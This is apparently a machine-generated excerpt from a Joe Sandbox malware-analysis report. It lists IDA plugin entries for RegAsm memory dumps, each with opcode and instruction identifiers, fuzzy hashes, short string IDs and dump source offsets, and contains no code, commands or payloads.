                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: e7db0ca1ae397a1901688a5a8435c001731cdb0346b40ea0b6e5ac1132431f89
                                                                      • Instruction ID: ed302111ef272ef238473813a38f8ee5c6733d3cf5ae16fe00a2236090123839
                                                                      • Opcode Fuzzy Hash: e7db0ca1ae397a1901688a5a8435c001731cdb0346b40ea0b6e5ac1132431f89
                                                                      • Instruction Fuzzy Hash: 34218C30B101148FDB94EB28D968B6EBBF6AF88714F21415AE502DF3A0CF768C04CB91
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Te^q
                                                                      • API String ID: 0-671973202
                                                                      • Opcode ID: c568e0b6f9700f039fae21134191848699644e519c7d210a85a88b5a5dbae9da
                                                                      • Instruction ID: 76306092a818209ec605e2cbf9dd5ade7fa3cdaa0cfeb083949f4b4afe6bddd7
                                                                      • Opcode Fuzzy Hash: c568e0b6f9700f039fae21134191848699644e519c7d210a85a88b5a5dbae9da
                                                                      • Instruction Fuzzy Hash: 26116D30B002459FDB54AF69C898BAABBF6EF88710F14445AE542EF3A1CB759C41CB90
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,bq
                                                                      • API String ID: 0-2474004448
                                                                      • Opcode ID: 4dddce375d21bf53419672a8df6f1d4f8a481becb0e201fe7671c0910810d0b0
                                                                      • Instruction ID: 112ce42fa61da1bd833cca0d09fe2e4487f9ad355ebbc662182e68221c6ee347
                                                                      • Opcode Fuzzy Hash: 4dddce375d21bf53419672a8df6f1d4f8a481becb0e201fe7671c0910810d0b0
                                                                      • Instruction Fuzzy Hash: 97018F71B042055FCB15EBAD984089FBBEAAFDA250714813AE949DB345DE30DD0587E1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4030fb8c09165383e8c84bad4081c0420d01f147ef062ad8c71c5658b79a044c
                                                                      • Instruction ID: a509eeefd28f68ce9bb596152c99403d9f9dc152c5f8a82ca24649f45f8341e8
                                                                      • Opcode Fuzzy Hash: 4030fb8c09165383e8c84bad4081c0420d01f147ef062ad8c71c5658b79a044c
                                                                      • Instruction Fuzzy Hash: C191D8317042059FDB65DF28D884A6ABBBAFF85310B14C56AF946CF351DB31D905CBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d91812b1c3bbeb227807165d73898f5c1b62be0458d232e701bcb23f8be69ef2
                                                                      • Instruction ID: 34d0d55f2834327001d8d63a163c5e5f7ae7500c28671c1a7445af3ab1d969db
                                                                      • Opcode Fuzzy Hash: d91812b1c3bbeb227807165d73898f5c1b62be0458d232e701bcb23f8be69ef2
                                                                      • Instruction Fuzzy Hash: 0091CD30B003158FCB98EF74D5A456DB7F2EFD5204B208969E9069B394DB39ED0ACB91
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fcc382ef7db7be53b0c18d804182d5eb725c72be12143e536e327d431f1d967f
                                                                      • Instruction ID: 82bcebba791d3f288e0effa37014192cd3e6e3ce396e5addb74654f713411368
                                                                      • Opcode Fuzzy Hash: fcc382ef7db7be53b0c18d804182d5eb725c72be12143e536e327d431f1d967f
                                                                      • Instruction Fuzzy Hash: D351D070A0060A8FCB10DFA9C9C4A6AFBFAFF89310F55C569D5658B291D730E895CBD0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f6589bd3993cbcdc75c3b69ee5907be07aa240926dfa26eac182ecbcf53fa11
                                                                      • Instruction ID: b5ebd6f7c2ce4c81d12919901733035415f6e43eba292d30f0dbe37f19b9b664
                                                                      • Opcode Fuzzy Hash: 3f6589bd3993cbcdc75c3b69ee5907be07aa240926dfa26eac182ecbcf53fa11
                                                                      • Instruction Fuzzy Hash: 8E412475D00248DFDB54DFA9D994ADEBBF5FF88304F14802AE405AB250DB71A945CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 14f94ebc985446384945f0c5ff9881e13b0f0532c69d09b68e2a5d49699db586
                                                                      • Instruction ID: 1aeee18488d70fc8ad749dc0253ae18f16e1ca800286606bb560a7b69af8b002
                                                                      • Opcode Fuzzy Hash: 14f94ebc985446384945f0c5ff9881e13b0f0532c69d09b68e2a5d49699db586
                                                                      • Instruction Fuzzy Hash: 8D416074A00105CFCB54EF98C984A6AFBB2FF55315F1184A5E816AF7A2C731EC41CBA1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5cea3442d910888ed7470855f67c0295ec10d29b26ca661c877c7cceaef1705a
                                                                      • Instruction ID: 8e5f78e4c056aea961ad228a8bee6c2b6848e271e504878467a56e8926cf5e36
                                                                      • Opcode Fuzzy Hash: 5cea3442d910888ed7470855f67c0295ec10d29b26ca661c877c7cceaef1705a
                                                                      • Instruction Fuzzy Hash: B6413FB1E01249DFDB14DFA9D998ADEBBF6EF48304F20802AE409AB250DB715945CF50
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bb929b3e0d3ce3e7c57eefb0a88b1849edc31c1af896f12433cd087fbd24b1e0
                                                                      • Instruction ID: 4d0cb5f3f44d2abae87d763848bafe4f5d225481d7646cfc71904f415b680748
                                                                      • Opcode Fuzzy Hash: bb929b3e0d3ce3e7c57eefb0a88b1849edc31c1af896f12433cd087fbd24b1e0
                                                                      • Instruction Fuzzy Hash: 4021F6307003114BCF54AF75A5541AE77A3DBD4645B208568DA0AD7384EF7ADD0BC7C5
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130034627.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_14ed000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c01e5e1d82a836346bf1cfb87da092a222a1a68f6118d2acfa6857b9a59ffca7
                                                                      • Instruction ID: dba2e912cc56bf3198e75c4844d1e05877858a4710df5296ca1df61bba3d1ba5
                                                                      • Opcode Fuzzy Hash: c01e5e1d82a836346bf1cfb87da092a222a1a68f6118d2acfa6857b9a59ffca7
                                                                      • Instruction Fuzzy Hash: CD213BB5904244DFDB01DF58D9C8B27BBE5FB84326F24CA6ED8090B756C335D406C661
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130034627.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_14ed000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 86d219adcd684ec432fd2b3edcb43eeec3a084894b142c902b1e1a70daeb7c9f
                                                                      • Instruction ID: edebc867d7c96d98be81eb510529fda3c160af2b3253c64b4e3ec46ec2d4261f
                                                                      • Opcode Fuzzy Hash: 86d219adcd684ec432fd2b3edcb43eeec3a084894b142c902b1e1a70daeb7c9f
                                                                      • Instruction Fuzzy Hash: 7D214975A04200DFDB05DF58D9C8B26BBE1FB94319F24CAAED80A4B366C336D406CB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130034627.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_14ed000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d47af8bcd75710edbce85af38df09328f1595cc1f91928d0cfb7623c6915ad9e
                                                                      • Instruction ID: 1849e3867288ce5588b1104c9f4c67d3fcbade5c6ff20bd523d78f08fdf92837
                                                                      • Opcode Fuzzy Hash: d47af8bcd75710edbce85af38df09328f1595cc1f91928d0cfb7623c6915ad9e
                                                                      • Instruction Fuzzy Hash: 03212575A04200DFDB05DF58C9C8B26FBE1EB84315F24CA6ED80A4B366C336D446CA61
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80c17c014c39266dadc43dc19aa9009bc53d4fce5f0c1072d7ec531a41ee775b
                                                                      • Instruction ID: 0f593db20c85db6eba6b3a33f65fd859e58b7ea020a2d263a71e2139b335e701
                                                                      • Opcode Fuzzy Hash: 80c17c014c39266dadc43dc19aa9009bc53d4fce5f0c1072d7ec531a41ee775b
                                                                      • Instruction Fuzzy Hash: ED21B071A001158FCB55EF98D5809AAFBB2FFA0310F5188A5D495AB652C730FC01CBE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 05898cf8d3ae1cf8fe77644459c940ec00f59cdc739dc848a7db8dec2214ad88
                                                                      • Instruction ID: 126d5cde08ea10da6433e928b3d5cc98be11993b241968d663605cfa8fbe5636
                                                                      • Opcode Fuzzy Hash: 05898cf8d3ae1cf8fe77644459c940ec00f59cdc739dc848a7db8dec2214ad88
                                                                      • Instruction Fuzzy Hash: 3111E6B02003A55FCB51EB38E850A9E7BA2EF82245F208B69D1455F382CB795D4B8BD1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2f23ca0a2b94a3c38b63aff7f0b876ae78e1d94d3bf987491807f4047b64559c
                                                                      • Instruction ID: f258d16d373b951ac077be7b19c7faad14ba0190cd9c796e5dac1fbf4dcc8c1d
                                                                      • Opcode Fuzzy Hash: 2f23ca0a2b94a3c38b63aff7f0b876ae78e1d94d3bf987491807f4047b64559c
                                                                      • Instruction Fuzzy Hash: 9B11277A3001149FCF08DF59E984D5A7BAAFF8C721B108156FA058B362CB36DC11DBA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130034627.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_14ed000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e23bb56b8e7db59dec991ddb6a54cb720ad56699ca06e3f6d92acd6788231654
                                                                      • Instruction ID: c4c546b51b56620e7008fb8566a1616c5846eb1e0fa53e4eddec177b65689f43
                                                                      • Opcode Fuzzy Hash: e23bb56b8e7db59dec991ddb6a54cb720ad56699ca06e3f6d92acd6788231654
                                                                      • Instruction Fuzzy Hash: 7D119076904680CFDB12CF14D5C8B1ABBA1FB84225F24C6AAD8494B756C33AD44ACB51
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130034627.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_14ed000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a9baf654dc92b14a4e56fe5c301c1f99d39df88bd30237c7f630f359bf4ddbcd
                                                                      • Instruction ID: 3114a389ac993bc9a6b60ac910e66603821ea78cf572b548889a713eecf99ab5
                                                                      • Opcode Fuzzy Hash: a9baf654dc92b14a4e56fe5c301c1f99d39df88bd30237c7f630f359bf4ddbcd
                                                                      • Instruction Fuzzy Hash: 0711BB75904280CFDB06CF54D9C8B16FBA1FB84225F28C6AAD8494B766C33AD44ACB61
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4130034627.00000000014ED000.00000040.00000800.00020000.00000000.sdmp, Offset: 014ED000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_14ed000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a9baf654dc92b14a4e56fe5c301c1f99d39df88bd30237c7f630f359bf4ddbcd
                                                                      • Instruction ID: 305a69e815f18e2740496831736bec9b5825bda9033124aa95857b5cf4ffc950
                                                                      • Opcode Fuzzy Hash: a9baf654dc92b14a4e56fe5c301c1f99d39df88bd30237c7f630f359bf4ddbcd
                                                                      • Instruction Fuzzy Hash: E211BE75904280CFDB02CF54D5C8B16BBB1FB84319F24C6AAD8494B766C33AD44ACB52
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5a8fae26eefb085590590356a940d25669a1f789200dffb0f33e8e2ff21d5935
                                                                      • Instruction ID: 23a76bc915498ad8eca1666019635e7f8eddc0c0f8b309892e966e214067cfb0
                                                                      • Opcode Fuzzy Hash: 5a8fae26eefb085590590356a940d25669a1f789200dffb0f33e8e2ff21d5935
                                                                      • Instruction Fuzzy Hash: 2811C6B02003659FCB51FF38E85065E7BA2EBC1245F208A29D1054F386DB7AAD4A8BD0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 87cc7b2802fb33654cae98907b292426c20de5abd04316d6d4ab728d55f8eec2
                                                                      • Instruction ID: bdf60a9c1789707ba853cb9ef2d442af5bbd64d91e5ce81e8c30f07740d8b37c
                                                                      • Opcode Fuzzy Hash: 87cc7b2802fb33654cae98907b292426c20de5abd04316d6d4ab728d55f8eec2
                                                                      • Instruction Fuzzy Hash: FC012C76304125AFCB02DF69DC84CAEBFEAEF89220310806AF549CB251DA319901CBE1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b0af452e00fbe0fbdb100721fd4f9c87a05f57da2a73c3f6a29fd50de6897d89
                                                                      • Instruction ID: f146d40c38bd24e9902d500b93f03bed80cdd105b12e4f5154c826ade0c42730
                                                                      • Opcode Fuzzy Hash: b0af452e00fbe0fbdb100721fd4f9c87a05f57da2a73c3f6a29fd50de6897d89
                                                                      • Instruction Fuzzy Hash: 13F0C8317082A51FC747AB7C581042E7FE6EFC361071548AAC185CF292DE388D86C3E2
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cf594e51bf75349dac428c32abdd93249faa54339f36b73cb7529e8cbb0d6795
                                                                      • Instruction ID: c832cefa0af10f19dc4004521ffe455c3b3eeaa5e7af0bffe3344c989eb4ad2c
                                                                      • Opcode Fuzzy Hash: cf594e51bf75349dac428c32abdd93249faa54339f36b73cb7529e8cbb0d6795
                                                                      • Instruction Fuzzy Hash: C6F0C2715047605FC7228B659850D67FBFDFF84311B14892AEAC58B541CA349896C7B0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e9838609c19a07fba0327539c4dab95a1b0adb7a35c774c97ecc84b44d7090a2
                                                                      • Instruction ID: 7fa283b4deab8335bf5a82beb9a32aa05ad7e8fc13a37f0fe7120ad4d8ff8493
                                                                      • Opcode Fuzzy Hash: e9838609c19a07fba0327539c4dab95a1b0adb7a35c774c97ecc84b44d7090a2
                                                                      • Instruction Fuzzy Hash: 09F0F976700118AF8B44DF59D884CAFBBAEFF8C2617108026F509C7310CA3199018BA0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 641591b3edadf8c316c065e6e85425a90136e79b03867f046d3b784f9eac7afe
                                                                      • Instruction ID: 7793b6cf9b0aa19e5c26b0bf3d4c446231f1e44b1e402974d025692420937fd3
                                                                      • Opcode Fuzzy Hash: 641591b3edadf8c316c065e6e85425a90136e79b03867f046d3b784f9eac7afe
                                                                      • Instruction Fuzzy Hash: 8E01287090131ACFCB94EFA9D444AEABBF1FF48304B10856DD55AAB211D731AA82CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d398091a1921012f2161c300626deeaa832fdc0729a46a21af7e28cb5049fab3
                                                                      • Instruction ID: 35464f094a84ee1719c12dca666d2d33b57ebc1db3ca9a463ba9f19338e7ecc2
                                                                      • Opcode Fuzzy Hash: d398091a1921012f2161c300626deeaa832fdc0729a46a21af7e28cb5049fab3
                                                                      • Instruction Fuzzy Hash: 9AF01430D0032ACFCB94EFA9D8456AEBBF1EF48310B108829D519A7210D335AA42CF90
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 606789a1d1a002cc8ce3a38d4be58471348181b44eb47fa928a2e90cfbf8ffa1
                                                                      • Instruction ID: 4eab890b1061d041a489b0b47585bfd26ac6964d56bcbeb8e841069b9eed4b02
                                                                      • Opcode Fuzzy Hash: 606789a1d1a002cc8ce3a38d4be58471348181b44eb47fa928a2e90cfbf8ffa1
                                                                      • Instruction Fuzzy Hash: C8E0926130A2501BC756767D689156FBBDAAFC65203A6007AE289CB382CD654C4A83F6
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9c2a4030525a092c80419df44265f447c78bfff3e1233b8102c8086362104872
                                                                      • Instruction ID: 69ed4fefa0a9083443842af90b1c7d39867b7960951b9ee64b964e432d14d7f8
                                                                      • Opcode Fuzzy Hash: 9c2a4030525a092c80419df44265f447c78bfff3e1233b8102c8086362104872
                                                                      • Instruction Fuzzy Hash: 76F0E5F06007A68BCF91BF74E88425EBB91EF90295F208722D1140F342DF7899978BC0
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 61895d7ff40043ef85add6b570c1b591be2f61a3b9eea685ca9e5def9319b436
                                                                      • Instruction ID: 99755dcfb673bd5cf8512280e0363cd166d43820c63fca96f9e9cf48b188dfb1
                                                                      • Opcode Fuzzy Hash: 61895d7ff40043ef85add6b570c1b591be2f61a3b9eea685ca9e5def9319b436
                                                                      • Instruction Fuzzy Hash: 6DD05E7230522417879875AE689197FA6CEEBC9961791403DE31DCB740CD729C0643E9
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bddd5afae2c3db8e867445b018e1d19cd8055e75fc5b678efe801e8298cfb48b
                                                                      • Instruction ID: e1359b345b61abc5599bc29f22e06b5631b82613ef2f03da11230245d7f7d23e
                                                                      • Opcode Fuzzy Hash: bddd5afae2c3db8e867445b018e1d19cd8055e75fc5b678efe801e8298cfb48b
                                                                      • Instruction Fuzzy Hash: 12E0D871A0010EFFCB00DFB5CD4086EBBEAEB81204700C568D609CB211EA31DE01D790
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fecdd09d7efd6982fbd031cbb5433250b651aa87ad807539270b091caf4e1485
                                                                      • Instruction ID: 555e852bebf3c2d27e26093843f27cceca4837022b932353dbdbfeb24e723cb8
                                                                      • Opcode Fuzzy Hash: fecdd09d7efd6982fbd031cbb5433250b651aa87ad807539270b091caf4e1485
                                                                      • Instruction Fuzzy Hash: ACE0D871A0010AEFCB40DFB4CE4196E77A6EF80204700C9689509DB210EA32DE02D740
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.4153283523.0000000006AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AE0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_6ae0000_RegAsm.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 80deaa7ed0e371f4491b60e1fc0ae471d3f5af031a83d0987ca5e3efb5a5ec9f
                                                                      • Instruction ID: a1fea632e8e7f13475b98c78e1710ba49bacd568a12abcd012693b4a8ec2d71e
                                                                      • Opcode Fuzzy Hash: 80deaa7ed0e371f4491b60e1fc0ae471d3f5af031a83d0987ca5e3efb5a5ec9f
                                                                      • Instruction Fuzzy Hash: F9E08C76A005258FC285FBA8964456D77CA9B81616706C866D10A9B202DF31CC4187E0